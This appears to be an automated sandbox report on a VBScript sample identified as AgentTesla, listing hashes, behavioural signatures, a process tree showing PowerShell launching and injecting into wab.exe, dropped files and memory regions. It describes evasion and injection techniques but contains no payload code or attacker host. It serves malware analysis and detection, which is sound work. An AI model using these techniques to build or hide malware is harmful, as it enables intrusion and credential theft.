Analysis

  • max time kernel
    144s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19-06-2024 14:49

General

  • Target

    03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs

  • Size

    92KB

  • MD5

    1a0f278542c1a82b36d2a9339c44343f

  • SHA1

    7464df5fb5eae9f2bb2de37aac91729be222c801

  • SHA256

    03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d

  • SHA512

    4e3e255185ffe407661cd5f6ef18aceaf39e4b7410926e14c2580fe9ba7a5ba3edbdf5834c03eec9662ab6b111da262ba5f8632e3304766eb99f42a60eb62ec6

  • SSDEEP

    1536:w01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5R/:w09LB0DnWzhX7RXaSMxhxsAhWEwhrdMT

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Blocklisted process makes network request (2 IoCs)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  • Looks up external IP address via web service (3 IoCs)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  • Suspicious use of SetThreadContext (1 IoC)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)

    Uses a powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses (8 IoCs)
  • Suspicious behavior: MapViewOfSection (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (3 IoCs)
  • Suspicious use of WriteProcessMemory (15 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4156
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4612
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
        3⤵
          PID:4772
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3632
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
            4⤵
              PID:3956
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2992
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=752 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:2172

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          3KB

          MD5

          932bb90d0770b73ad24dda9174ced743

          SHA1

          f2d7323b5d3f2978fb30f7b9b026497d968dac13

          SHA256

          549edc4d8c1f25c916f19b68f412ca4957d6191503dfce38c96f49b2a1d3d37b

          SHA512

          c7846774f118add3458fced652bc94d3527342415c10dc1a731413e6d94b22fbc3115d5eda4236523a221f450586dbedf29f7751a9e8e2655861f21d0653f3d1

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          565B

          MD5

          efff69aad6f8946d6499b060b419aa81

          SHA1

          530aa1bdae43c5f072c115b2fe91961538b60640

          SHA256

          6bd5f8250d34b23ed5c512f9c999e035b6c1d225d285ffa04633000ccac9d0a2

          SHA512

          2fd66e4bdc2286a58b4bb5f5f7f57983f65054512fad479d216f11abc7e64c22f797e7bf89368e12dfbc732068f084e297d443f3dee228c83826c4d9c088413e

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          3KB

          MD5

          faad7bea993e46e2b93131dc5960cd02

          SHA1

          15b1a22cd47fd97d7de73275a628d81701a08fd4

          SHA256

          208c825c646d1cf301fd03495601599ad7937f2ff14c9172f361ac9ffc15ec1c

          SHA512

          c4d59712b52f7731692d78991a9d206c9bfac628eedbfd38ec05e0d055d09918580f1ccfbaaf98f2af6e81f2e4ced626d309fa2d3fb6b3cc832533674f0652d5

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          4KB

          MD5

          161ff62ce2710bf06c99035ae4493e0f

          SHA1

          76beb1725177edccce02ca2e9d7a1ebeacd2d99c

          SHA256

          d302e208e205fd7b08bd0844e787f15dec1fecd4f6e6056104a64f1105e32e4d

          SHA512

          135228bbf7cea08b76bc288335e1699828a642cd6b81761bba33ed5a40c28632b25cf8f8664fbf4ee2d21b573d1cda066614250054002c8bf4bda869389d03a6

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          1KB

          MD5

          b7874067dccb9132ddf6a88979ae2c18

          SHA1

          cb1065a2c0aa83bf9f136ed2ebfe4b68c52c9bf7

          SHA256

          ee6e201490ad62b76126e8ac505b524dfaa1a84f95e69a15638f5e868637101d

          SHA512

          c75128b9ae12129ab05e616cc3f57da66eaff1d1513d9d8efc163bd17b531bdc7ca2ecbd3255d9d7ac4d58b784117474a9e8ee7f9dff73d33345d9be7579bf18

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          1KB

          MD5

          a43144af0795d03343f43e5ddb4d0c08

          SHA1

          4375286a3bee1476b2e088fd49a1c7ad6fb81f07

          SHA256

          d3a5f44858e125f2e25444faf014f354318ac8b6a697c82a8b02d72dab4185d3

          SHA512

          8bbc5f40c35aa2ee157d4ec52c9ad76d58a9434650e801c90b08b0ef0a046db23a5cdc6f1d640c11edb65baac4300491509ec850dc9260f74612d4a8b6c79ab3

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          180B

          MD5

          5268416cacbeffd708e75a64a1cb2036

          SHA1

          50d9ad3cefa4b430903e7f1e527c3995b0ee3f7f

          SHA256

          7926f95348277654cbae2c84a5562a003fd308245e5a2d9a031bba7bd0d0c736

          SHA512

          bc3e355cd36ab9aa43c6156836250ad6d9217aebf7585a11057d462d11d0e1c2c0c4231f1bfaec58baffd6015a9a525d4b1f9cf39aea780ce2c34f69d700e6b4

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          1KB

          MD5

          6d3b3d25a64ba16d9f84e9189c0dd54c

          SHA1

          69f62e418510c9bb03d61a57b17b622ae1a58483

          SHA256

          7d69df7791ff9c20418aaf939d3caee005bcb34278e86f34a4bbb683e206a476

          SHA512

          30752727930d0cc6754b0c234e8ab12f44401527b06b749f8f901b211f8a140f0cd49a9baaabcb61d230ced62df02c49b5075c6dc7c6cc0ec5523203e82709bb

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          2KB

          MD5

          5fa80a0193e7241a3f1a1792965389a4

          SHA1

          244daa82a2298b181bfbcdf3c13915ea96dfafcb

          SHA256

          65a0b8d41a62b343fc2bae360e439fd1a5d8beeff3d8a5113ead8fa70bb18828

          SHA512

          7c156d2e9ebdd32b4bdaf996dc457a8e7507863fa9b3101537053f83849d34e3335b6e86887822bdfb254eb8a79ed860955c2f5a32b994ed90f3b9742959f461

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          2KB

          MD5

          76afd47a058f64a36fd3fc3fa8d42861

          SHA1

          89f3de4e12c7a21460321403a06369bf4353215b

          SHA256

          7737a78095f3719c5b04bc0e7ad43e9ce4ccc81a6bfb0e19805e3e4c30937285

          SHA512

          8866d01464f31db85beb445eabf98df3a73ba8260bafd5c35b1d2c1855a835b144da8ea778b434bcb28c3d43e9339922e982a093eabd9b72e985b90e350a4f1c

        • C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

          Filesize

          3KB

          MD5

          ef9b0d1f2b2713b683d77493108a6f08

          SHA1

          124933eb36c8e39dce55581347c7a23cc4fafe3a

          SHA256

          2731f761a38af729ab2184c73aa59507665308b3fd7e8b05090e6c2678283c8f

          SHA512

          9c653ff7debc32f416a21cc55f9dcb9a342af87b4c1c7b9464ac7f2813bd55fa58f0dff6c79806b2c7f7ec796279b74037d2107cacaf1ef4eb1f07fee6d73d75

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kumzcvv2.0vw.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Scrouge.Swi

          Filesize

          494KB

          MD5

          be60fe46432e08e827aeefd9f72d5790

          SHA1

          7322ebc77810e84976136174258dddde78a23f27

          SHA256

          8722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4

          SHA512

          72a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913

        • memory/2992-393-0x0000000025970000-0x000000002597A000-memory.dmp

          Filesize

          40KB

        • memory/2992-392-0x0000000025FF0000-0x0000000026082000-memory.dmp

          Filesize

          584KB

        • memory/2992-391-0x0000000025920000-0x0000000025970000-memory.dmp

          Filesize

          320KB

        • memory/2992-386-0x0000000000FF0000-0x0000000001032000-memory.dmp

          Filesize

          264KB

        • memory/2992-384-0x0000000000FF0000-0x0000000002244000-memory.dmp

          Filesize

          18.3MB

        • memory/3632-345-0x0000000006160000-0x00000000061C6000-memory.dmp

          Filesize

          408KB

        • memory/3632-371-0x0000000075310000-0x0000000075AC0000-memory.dmp

          Filesize

          7.7MB

        • memory/3632-341-0x0000000075310000-0x0000000075AC0000-memory.dmp

          Filesize

          7.7MB

        • memory/3632-342-0x00000000059B0000-0x0000000005FD8000-memory.dmp

          Filesize

          6.2MB

        • memory/3632-343-0x0000000005800000-0x0000000005822000-memory.dmp

          Filesize

          136KB

        • memory/3632-344-0x0000000005FE0000-0x0000000006046000-memory.dmp

          Filesize

          408KB

        • memory/3632-339-0x00000000051E0000-0x0000000005216000-memory.dmp

          Filesize

          216KB

        • memory/3632-351-0x00000000061D0000-0x0000000006524000-memory.dmp

          Filesize

          3.3MB

        • memory/3632-385-0x0000000075310000-0x0000000075AC0000-memory.dmp

          Filesize

          7.7MB

        • memory/3632-340-0x0000000075310000-0x0000000075AC0000-memory.dmp

          Filesize

          7.7MB

        • memory/3632-358-0x0000000006700000-0x000000000671E000-memory.dmp

          Filesize

          120KB

        • memory/3632-359-0x00000000067D0000-0x000000000681C000-memory.dmp

          Filesize

          304KB

        • memory/3632-369-0x0000000008E50000-0x000000000EAA9000-memory.dmp

          Filesize

          92.3MB

        • memory/3632-361-0x0000000008220000-0x000000000889A000-memory.dmp

          Filesize

          6.5MB

        • memory/3632-362-0x0000000006B90000-0x0000000006BAA000-memory.dmp

          Filesize

          104KB

        • memory/3632-363-0x0000000007BA0000-0x0000000007C36000-memory.dmp

          Filesize

          600KB

        • memory/3632-364-0x00000000078B0000-0x00000000078D2000-memory.dmp

          Filesize

          136KB

        • memory/3632-365-0x00000000088A0000-0x0000000008E44000-memory.dmp

          Filesize

          5.6MB

        • memory/3632-338-0x000000007531E000-0x000000007531F000-memory.dmp

          Filesize

          4KB

        • memory/3632-367-0x000000007531E000-0x000000007531F000-memory.dmp

          Filesize

          4KB

        • memory/3632-368-0x0000000075310000-0x0000000075AC0000-memory.dmp

          Filesize

          7.7MB

        • memory/4612-360-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-357-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-356-0x00007FFD774B3000-0x00007FFD774B5000-memory.dmp

          Filesize

          8KB

        • memory/4612-335-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-334-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-389-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-333-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp

          Filesize

          10.8MB

        • memory/4612-323-0x0000020054C00000-0x0000020054C22000-memory.dmp

          Filesize

          136KB

        • memory/4612-322-0x00007FFD774B3000-0x00007FFD774B5000-memory.dmp

          Filesize

          8KB